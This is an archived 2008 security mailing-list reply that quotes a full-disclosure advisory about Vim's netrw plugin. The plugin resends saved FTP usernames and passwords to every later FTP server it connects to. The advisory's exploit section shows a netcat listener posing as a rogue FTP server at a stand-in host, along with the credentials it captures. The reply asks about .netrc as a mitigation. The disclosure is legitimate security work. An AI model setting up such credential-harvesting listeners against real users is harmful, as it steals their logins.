lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 13 Aug 2008 00:18:05 +0200 From: Tony Mechelynck <antoine.mechelynck@...il.com> To: vim_dev@...glegroups.com Cc: bugs@....org, vim-dev@....org, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, "Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)" <drchip@...pbellfamily.biz> Subject: Re: Vim: Netrw: FTP User Name and Password Disclosure On 12/08/08 23:59, Jan Minář wrote: > Vim: Netrw: FTP User Name and Password Disclosure > > 1. SUMMARY > > Product : Vim -- Vi IMproved > Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109 > Impact : Credentials disclosure > Wherefrom: Remote > Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html > > The Vim Netrw Plugin shares the FTP user name and password across all > FTP sessions. Every time Vim makes a new FTP connection, it sends the > user name and password of the previous FTP session to the FTP server. > > > 2. BACKGROUND > > ``Vim is an almost compatible version of the UNIX editor Vi. Many new > features have been added: multi-level undo, syntax highlighting, > command line history, on-line help, spell checking, filename > completion, block operations, etc.'' > > -- Vim README.txt > > ``Netrw supports "transparent" editing of files on other machines > using [...] vim ftp://hostname/path/to/file'' > > ``Attempts to use ftp will prompt you for a user-id and a password. > These will be saved in global variables g:netrw_uid and > s:netrw_passwd; subsequent uses of ftp will re-use those two items > to simplify the further use of ftp. However, if you need to use a > different user id and/or password, you'll want to call NetUserPass() > first.'' > > -- Netrw Reference Manual (``pi_netrw.txt'') > > > 3. VULNERABILITY > > Once vim successfully connects to an FTP server using a user name and > password credentials, it will re-use them in all subsequent FTP > sessions, regardless of the domain name or TCP port. > > This behaviour is documented, although the documentation states the > credentials are ``retained on a per-session basis''. Apparently the Vim > session, not the FTP session: > > ``g:netrw_uid (ftp) user-id, retained on a per-session basis > s:netrw_passwd (ftp) password, retained on a per-session basis'' > > -- Netrw Reference Manual (``pi_netrw.txt'') > > Although FTP communication is not encrypted and therefore open to > eavesdropping, if the access to the network is protected, a > credentials-based access control is meaningful, and the credentials must > be kept secret. For example, an FTP connection to a virtual Xen > instance on the same physical machine is secure; so is an FTP session > over a local ethernet segment secured against access from untrusted > parties. > > > 4. EXPLOIT > > No adversary action on the part of the attacker is necessary, apart from > keeping logs of the user name, password, source IP address, and other > information about the FTP session. > > An example using netcat(1) for the rouge FTP server. There is another > FTP server already running on the machine: > > # For the sake of this example, a custom hosts file. Note that > # ftp.secure.example and ftp.rogue.example map to different IP > # addresses. > $ grep '\.example' /etc/hosts > 127.0.1.1 ftp.secure.example > 127.0.1.2 ftp.rogue.example > # There is a stock FTP server running already > $ netstat -plan | grep ftp > tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd > # Start the rogue FTP server > $ printf '220\r\n331\r\n' \ > | netcat -lp 31337 ftp.rogue.example> credentials& > # We use the ex command for clarity. > $ ex ftp://ftp.secure.example/ > Enter username: rdancer > Enter Password: ************* > Entering Ex mode. Type "visual" to go to Normal mode. > :spl ftp://ftp.rogue.example:31337/ > "ftp://ftp.rogue.example:31337/" --No lines in buffer-- > :qa! > $ cat credentials > USER rdancer > PASS z5vS24u76OrGM > > > 5. COPYRIGHT > > This advisory is Copyright 2008 Jan Minar<rdancer@...ncer.org> > > Copying welcome, under the Creative Commons ``Attribution-Share Alike'' > License http://creativecommons.org/licenses/by-sa/2.0/uk/ > > Code included herein, and accompanying this advisory, may be copied > according to the GNU General Public License version 2, or the Vim > license. See the subdirectory ``licenses''. > > Various portions of the accompanying code may have been written by > various parties. Those parties may hold copyright, and those portions > may be copied according to their respective licenses. > > > 6. HISTORY > > 2008-08-12 Sent to:<bugs@....org>,<vim-dev@....org>, > <full-disclosure@...ts.grok.org.uk>, > <bugtraq@...urityfocus.com>, > Charles E Campbell, Jr (Vim Netrw Plugin Maintainer) > <drchip@...pbellfamily.biz> If the attacker has access to full logs of the FTP back-and-forth talk, is it possible to keep the username and password secret? Netrw mentions that if there exists a .netrc file (which ftp will use if it is not world-readable, e.g. on Linux it needs 600 permissions) which includes an applicable "machine" or "default" line, the user won't be asked for a username and password (see ":help netrw-netrc"). I'm not sure whether and to what degree this applies to non-Unix-like OSes such as Windows. Best regards, Tony. -- Lysistrata had a good idea.
Powered by blists - more mailing lists